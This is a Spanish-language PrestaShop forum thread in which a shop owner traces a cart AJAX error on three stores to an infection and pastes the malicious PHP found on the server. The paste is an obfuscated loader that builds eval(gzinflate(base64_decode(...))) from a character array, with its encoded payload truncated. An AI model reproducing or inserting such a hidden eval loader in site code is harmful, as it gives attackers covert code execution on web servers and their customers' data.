Jump to content

Mismo problema con el carrito en tres tiendas diferentes


desafioarea

Recommended Posts

Hola amigos.

 

Os cuento. Tengo tres tiendas alojadas en el mismo servidor. Una está en la versión 1.3.7 y las otras dos en la versión 1.4.6

 

Hace unas semanas he empezado a tener problemas con el carrito. Siempre funcionó correctamente. El mismo problema en las tres.

 

si activo el Ajax me da el siguiente error en las tres: Technical error: unable to add the product.

Details: error thowrn: [objet XMLHttpRecuest] text status: parsererror.

 

Si desactivo el modo ajax, al añadir al carrito me va a la hoja resumen y me hace unas cuentas muy raras, por ejemplo no me calcula bien la cifra de compra para que el producto se envíe gratis, y la suma sin IVA, también me lo hace mal... aunque al final el precio y el resultado es correcto.

 

Ya no se que hacer, y no encuentro soluciones. En el hosting me dicen que no es un problema suyo, ya que tienen más tiendas de otros clientes y no tienen este problema... Pero es que me ha pasado a la misma vez en las tres... Muyyyyyy raro...

 

Las tiendas son por si queréis echar un vistazo.

 

tienda.serviciotecnicoenvalencia.com

www.tiendacosmeticanatural.es

www.tiendacomidanatural.com

 

Ahora tengo desactivado el modo ajax.

 

Muchas gracias por vuestra ayuda.

Link to comment
Share on other sites

Hola amigos.

 

Os cuento. Tengo tres tiendas alojadas en el mismo servidor. Una está en la versión 1.3.7 y las otras dos en la versión 1.4.6

 

Hace unas semanas he empezado a tener problemas con el carrito. Siempre funcionó correctamente. El mismo problema en las tres.

 

si activo el Ajax me da el siguiente error en las tres: Technical error: unable to add the product.

Details: error thowrn: [objet XMLHttpRecuest] text status: parsererror.

 

Si desactivo el modo ajax, al añadir al carrito me va a la hoja resumen y me hace unas cuentas muy raras, por ejemplo no me calcula bien la cifra de compra para que el producto se envíe gratis, y la suma sin IVA, también me lo hace mal... aunque al final el precio y el resultado es correcto.

 

Ya no se que hacer, y no encuentro soluciones. En el hosting me dicen que no es un problema suyo, ya que tienen más tiendas de otros clientes y no tienen este problema... Pero es que me ha pasado a la misma vez en las tres... Muyyyyyy raro...

 

Las tiendas son por si queréis echar un vistazo.

 

tienda.serviciotecnicoenvalencia.com

www.tiendacosmeticanatural.es

www.tiendacomidanatural.com

 

Ahora tengo desactivado el modo ajax.

 

Muchas gracias por vuestra ayuda.

 

Hola, he intentado probar pero tienes deshabilitado el ajax.

 

¿Le pasa a todo el mundo o sólo a tí?

 

Primero prueba a eliminar las cookies de tu navegador, y mira a ver si te funciona.

Link to comment
Share on other sites

Lo estraño

Fue lo primero que hice.... y no son mis cookies...

 

Estoy totalmente perdido... gracias por tu ayuda

Comprueba la versión que tienes del módulo carrito, y si además si tienes ficheros del carrito en el propio tema, es decir alguno que sobrescriba al del módulo.

¿Has actualizado algo? ¿O simplemente de un día para otro dejó de funcionar?

 

He encontrado esto por el foro, por si además quieres echar un vistazo...

http://www.prestashop.com/forums/topic/99063-problema-error-thrown-object-xmlhttprequest/

http://www.prestashop.com/forums/topic/48662-error-object-xmlhttprequest-solo-con-https/

Link to comment
Share on other sites

  • 3 weeks later...

Hola.

 

Solucionado el tema del carrito.

 

Era un churro (virus) que teníamos en todas las tiendas... lo más curioso es que también en los wordpress que tenemos en este servidor... Ellos dicen que solamente nos pasa a nosotros.... estoy desconcertado.

 

Hemos limpiado todo y funciona correctamente.

 

Este es el virus. Alguien sabe que es o para que es....

 

Gracias

 

 

<?php

$md5 = "00000000000000000000000000000000";

$aa = array("s",'c',')','o',"n",'i',"l",'e',"b",'6',"r","a",";","4",'g',"(",'_','t','v',"z","$",'f',"d");

$bad = create_function('$'.'v',$aa[7].$aa[18].$aa[11].$aa[6].$aa[15].$aa[14].$aa[19].$aa[5].$aa[4].$aa[21].$aa[6].$aa[11].$aa[17].$aa[7].$aa[15].$aa[8].$aa[11].$aa[0].$aa[7].$aa[9].$aa[13].$aa[16].$aa[22].$aa[7].$aa[1].$aa[3].$aa[22].$aa[7].$aa[15].$aa[20].$aa[18].$aa[2].$aa[2].$aa[2].$aa[12]);

$bad('FZtFssNatkSHU++FGmKKH9UQsyy0oFMhZmaN/vtO4F........................................... "más otras 100 líneas"....

Edited by desafioarea (see edit history)
Link to comment
Share on other sites

Hola.

 

Solucionado el tema del carrito.

 

Era un churro (virus) que teníamos en todas las tiendas... lo más curioso es que también en los wordpress que tenemos en este servidor... Ellos dicen que solamente nos pasa a nosotros.... estoy desconcertado.

 

Hemos limpiado todo y funciona correctamente.

 

Este es el virus. Alguien sabe que es o para que es....

 

Gracias

 

 

<?php

$md5 = "00000000000000000000000000000000";

$aa = array("s",'c',')','o',"n",'i',"l",'e',"b",'6',"r","a",";","4",'g',"(",'_','t','v',"z","$",'f',"d");

$bad = create_function('$'.'v',$aa[7].$aa[18].$aa[11].$aa[6].$aa[15].$aa[14].$aa[19].$aa[5].$aa[4].$aa[21].$aa[6].$aa[11].$aa[17].$aa[7].$aa[15].$aa[8].$aa[11].$aa[0].$aa[7].$aa[9].$aa[13].$aa[16].$aa[22].$aa[7].$aa[1].$aa[3].$aa[22].$aa[7].$aa[15].$aa[20].$aa[18].$aa[2].$aa[2].$aa[2].$aa[12]);

$bad('FZtFssNatkSHU++FGmKKH9UQsyy0oFMhZmaN/vtO4F........................................... "más otras 100 líneas"....

 

wow

 

Creo que haber leido esto del virus en algun otro post por el foro.

 

Pues si solucionado el tema se quedo, añadido la palabra "solucionado" al titulo tienes que añadir... (al menos eso dicen las normas del foro)

Link to comment
Share on other sites

  • 3 weeks later...
Guest
This topic is now closed to further replies.
×
×
  • Create New...